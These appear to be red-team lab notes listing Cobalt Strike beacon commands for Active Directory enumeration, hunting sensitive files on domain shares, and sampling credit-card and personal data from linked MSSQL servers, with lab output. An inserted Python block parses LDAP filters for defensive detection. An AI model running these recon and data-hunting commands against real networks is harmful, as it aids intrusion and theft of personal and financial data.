domain recon

It’s worth noting that performing domain recon in a high integrity process is not required, and in some cases (such as SYSTEM) can be detrimental.

Tools to use:

ADSearch

ADSearch has fewer built-in searches compared to PowerView and SharpView, but it does allow you to specify custom Lightweight Directory Access Protocol (LDAP) searches. These can be used to identify entries in the directory that match given criteria.

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "objectCategory=user"

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=group)(cn=*Admins))"

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=group)(cn=MS SQL Admins))" --attributes cn,member

Use --json for JSON output.
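The custom searches ADSearch accepts are plain RFC 4515 LDAP search filters. The following is an added example, not part of these notes or the ADSearch project: a small Python parser for that filter syntax plus a heuristic that flags filters characteristic of bulk directory enumeration, the kind of check a defender can run over search filters recorded on a domain controller (for example from Directory Service event 1644 when Field Engineering diagnostic logging is enabled). The filter strings tested are the ones from the commands above; the enumeration heuristics are assumptions constructed for this example.

```python
import re

_ITEM = re.compile(r"([A-Za-z][\w.;-]*)(>=|<=|~=|=)([^()]*)")  # attr, operator, value

def parse_filter(text):
    """Parse an RFC 4515 filter, e.g. (&(objectCategory=group)(cn=*Admins)), into a tree of
    ('&'|'|'|'!', [children]) or ('item', attr, operator, value). A bare attr=value is wrapped."""
    s = text.strip()
    s = s if s.startswith("(") else f"({s})"
    node, pos = _parse(s, 0)
    if pos != len(s):
        raise ValueError(f"trailing data at offset {pos}")
    return node

def _parse(s, i):
    if i + 1 >= len(s) or s[i] != "(":
        raise ValueError(f"expected '(' at offset {i}")
    i += 1
    if s[i] in "&|":                      # AND / OR: zero or more nested filters
        op, kids, i = s[i], [], i + 1
        while i < len(s) and s[i] == "(":
            kid, i = _parse(s, i)
            kids.append(kid)
        node = (op, kids)
    elif s[i] == "!":                     # NOT: exactly one nested filter
        kid, i = _parse(s, i + 1)
        node = ("!", [kid])
    else:                                 # simple item; '*' in the value marks substrings
        m = _ITEM.match(s, i)
        if not m:
            raise ValueError(f"bad filter item at offset {i}")
        node, i = ("item", m.group(1).lower(), m.group(2), m.group(3)), m.end()
    if i >= len(s) or s[i] != ")":
        raise ValueError(f"expected ')' at offset {i}")
    return node, i + 1

def enumeration_hints(filter_text):
    """Traits typical of bulk directory enumeration (heuristics constructed for this example)."""
    stack, leaves, hints = [parse_filter(filter_text)], [], []
    while stack:
        node = stack.pop()
        if node[0] != "item":
            stack.extend(reversed(node[1]))   # keep left-to-right order of the filter
            continue
        leaves.append(node)
        _, attr, op, value = node
        if attr in ("objectcategory", "objectclass"):
            hints.append(f"selects every {value} object")
        elif op == "=" and "*" in value:
            hints.append(f"wildcard match on {attr}")
    if len(leaves) == 1 and hints:
        hints.append("no narrowing clause")
    return hints
```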

data hunting

domain shares

beacon> powershell Find-DomainShare -CheckShareAccess

# search for interesting file extensions
beacon> powershell Find-InterestingDomainShareFile -Include *.doc*, *.xls*, *.csv, *.ppt*

# get parts of files
beacon> powershell gc \\fs.dev.cyberbotic.io\finance$\export.csv | select -first 5

MSSQL

beacon> powershell Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "email,address,credit,card" -SampleSize 5 | select instance, database, column, sample | ft -autosize

# direct queries; these reach sql-1 through the linked server on sql-2 using openquery
beacon> powershell Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select * from openquery(""sql-1.cyberbotic.io"", 'select * from information_schema.tables')"

beacon> powershell Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select * from openquery(""sql-1.cyberbotic.io"", 'select column_name from master.information_schema.columns where table_name=''employees''')"

beacon> powershell Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select * from openquery(""sql-1.cyberbotic.io"", 'select top 5 first_name,gender,sort_code from master.dbo.employees')"
 
first_name gender sort_code
---------- ------ ---------
Juliann    Female 09-46-87 
Rhodie     Female 89-74-73 
Calypso    Female 77-33-04 
Burt       Male   36-84-98 
Gayelord   Male   28-16-45